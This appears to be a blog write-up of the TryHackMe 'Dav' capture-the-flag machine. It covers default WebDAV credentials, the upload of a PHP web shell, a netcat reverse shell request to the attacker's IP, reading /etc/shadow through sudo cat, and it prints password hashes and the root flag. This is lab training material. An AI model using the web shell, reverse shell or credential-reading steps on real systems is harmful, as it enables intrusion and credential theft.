THM: Dav
Introduction
boot2root machine for FIT and bsides guatemala CTF
This is Dav from THM. This one is ranked as easy and doesn’t give much in the way of hints as to what it’s about.
Ports
HTTP only; makes it simple.
HTTP
Running a basic gobuster turns up a single page: /webdav. This has basic authentication turned on; let’s try some default credentials: wampp:xampp - success! We find some more credentials:
wampp:$apr1$Wm2VTkFL$PVNRQv7kzqXQIHe14qKA91
But I can’t crack the hash, and at this stage I don’t have anywhere to use it anyway. What else can we do? I’ve never done webdav before.
This blog gives some instructions; essentially we can use a command line tool called cadaver to connect and it provides a connection somewhat like FTP or SMB.
root@kali:/opt/tryhackme/dav# cadaver
dav:!> open http://10.10.49.116/webdav
Authentication required for webdav on server `10.10.49.116':
Username: wampp
Password:
dav:/webdav/> id
Unrecognised command. Type 'help' for a list of commands.
dav:/webdav/> help
Available commands:
ls cd pwd put get mget mput
edit less mkcol cat delete rmcol copy
move lock unlock discover steal showlocks version
checkin checkout uncheckout history label propnames chexec
propget propdel propset search set open close
echo quit unset lcd lls lpwd logout
help describe about
Aliases: rm=delete, mkdir=mkcol, mv=move, cp=copy, more=less, quit=exit=bye
dav:/webdav/> ls
Listing collection `/webdav/': succeeded.
passwd.dav 44 Aug 25 2019Shell
Using this interface I upload some PHP code to a file called cmd.php
<?php system($_GET[‘cmd’]);?>
From there, I can issue a shell command with Burp Repeater:
GET /webdav/cmd.php?cmd=rm+/tmp/f%3bmkfifo+/tmp/f%3bcat+/tmp/f|/bin/sh+-i+2>%261|nc+10.9.10.123+1234+>/tmp/f HTTP/1.1
Privsec
I run linpeas; we can run cat as root. From there we get the root flag and can also read the shadow file if we want:
www-data@ubuntu:/dev/shm$ sudo -u root /bin/cat /root/root.txt
sudo -u root /bin/cat /root/root.txt
101101ddc16b0cdf65ba0b8a7af7afa5
www-data@ubuntu:/dev/shm$ sudo -u root /bin/cat /etc/shadow
sudo -u root /bin/cat /etc/shadow
root:!:18134:0:99999:7:::
OTHERS REMOVED
merlin:$1$EWeeql.h$8mH.7rEhPRGsOb5ECtmIe1:18134:0:99999:7:::
sshd:*:18134:0:99999:7:::
wampp:$6$f8LMirW0$43znQ5kMsELDO9BdUmhbGkUEnVH2OKXZjfEtsyUgbvL79KoJtgLkdbJpHw4OuDDIMtaXjGjkjaRKDv1FFxKsr/:18134:0:99999:7:::
www-data@ubuntu:/dev/shm$ root@kali:/opt/tryhackme/dav# So that was pretty straightforward.